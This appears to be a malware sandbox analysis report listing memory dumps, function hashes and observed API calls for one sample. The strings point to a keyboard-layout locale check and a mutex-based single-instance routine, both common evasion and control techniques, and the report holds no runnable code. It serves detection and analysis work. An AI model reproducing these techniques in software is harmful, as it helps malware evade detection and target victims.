Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
API String ID: 3677997916-1112634906
Opcode ID: 431f5680ebca237da8f5b5f3fbda0c473135941ab8926f1a418f1666b8669be3
Instruction ID: 3c633b80644008ebfab6834561ab99ce9aba4477b7aa9990c520185cf3032a40
Opcode Fuzzy Hash: 431f5680ebca237da8f5b5f3fbda0c473135941ab8926f1a418f1666b8669be3
Instruction Fuzzy Hash: CDC23771A101189BDF28DF28CC89BEDB779EF45304F144299E809E72C2DB719AA8CF55

Function 0024735A Relevance: 2.5, APIs: 1, Instructions: 1031COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: ConditionVariableWake
String ID:
API String ID: 1192502693-0
Opcode ID: ef83e1f4aa64a54b6237f5249e7d6ee9a41caef575e3392c6fe9bf174b9a1e3b
Instruction ID: aeb4dc05039d7d558901fbc66051fd4520c4596ba6cffdb7cf5d1c6c27f0acd4
Opcode Fuzzy Hash: ef83e1f4aa64a54b6237f5249e7d6ee9a41caef575e3392c6fe9bf174b9a1e3b
Instruction Fuzzy Hash: 37727B71A202449BEB1CEF38DC89B9DBB79EB45300F508259F815A73C1DB359AA4CF91

Function 0027652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0027652A,?,?,?,?,?,00277661), ref: 00276567

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 9067950627a96d871ed4ef9ddbcfcdd5043eebce21995614e369e8b6f467dd23
Instruction ID: b9e432bd97aeca1722d2cd6ff121ec2f463202d678726c819af13967b5cb1195
Opcode Fuzzy Hash: 9067950627a96d871ed4ef9ddbcfcdd5043eebce21995614e369e8b6f467dd23
Instruction Fuzzy Hash: D9E0C230020508AFCF25BF58C91DD8D3B2AEF51756F608804FE0C4A626CB35EDB1DA80

Function 04A70DA1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a70000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460e35afef55ab26bc4085e39f0b0d4669516518542474850714c3075a685137
Instruction ID: c0e15e3164bdf3c22b096193158cf5f991c407b016af3204ccf074f710d25752
Opcode Fuzzy Hash: 460e35afef55ab26bc4085e39f0b0d4669516518542474850714c3075a685137
Instruction Fuzzy Hash: 8B01F6FB38C211BD716195556F18AF7677DE6C6730330C826F40BC1502F2946A496132

Function 00245C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 002460FA
00000422, xrefs: 002460C9
00000419, xrefs: 00246098
Keyboard Layout\Preload, xrefs: 00246054
0000043f, xrefs: 0024612B

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 70031ff902cfd663d065ae8254f06c33d7d83ae99735935f1c738431ea9378fe
Instruction ID: 1021050b10f3ca5cbb8d8d18219bf6b8a39a407d737c7ac4cd28e3a9744e5229
Opcode Fuzzy Hash: 70031ff902cfd663d065ae8254f06c33d7d83ae99735935f1c738431ea9378fe
Instruction Fuzzy Hash: E9F1E3709102589FEB28DF54CC84BDEBBB9EF45304F5042A9F908A72C1DB749A98CF95

Function 00249BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: fafc0a3d95dd92b5f345c75b3a6956c14235090a094be85d9600360bb75715b6
Instruction ID: ede7f8d5b51855c535fa75cf56ac2b3a958519c89acf2d46397256da55a65ab4
Opcode Fuzzy Hash: fafc0a3d95dd92b5f345c75b3a6956c14235090a094be85d9600360bb75715b6
Instruction Fuzzy Hash: 8431A6316642008BFB1CDB78ECC976EB7A6EB86310F208218E404972D2C77589A48751

Function 00249F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
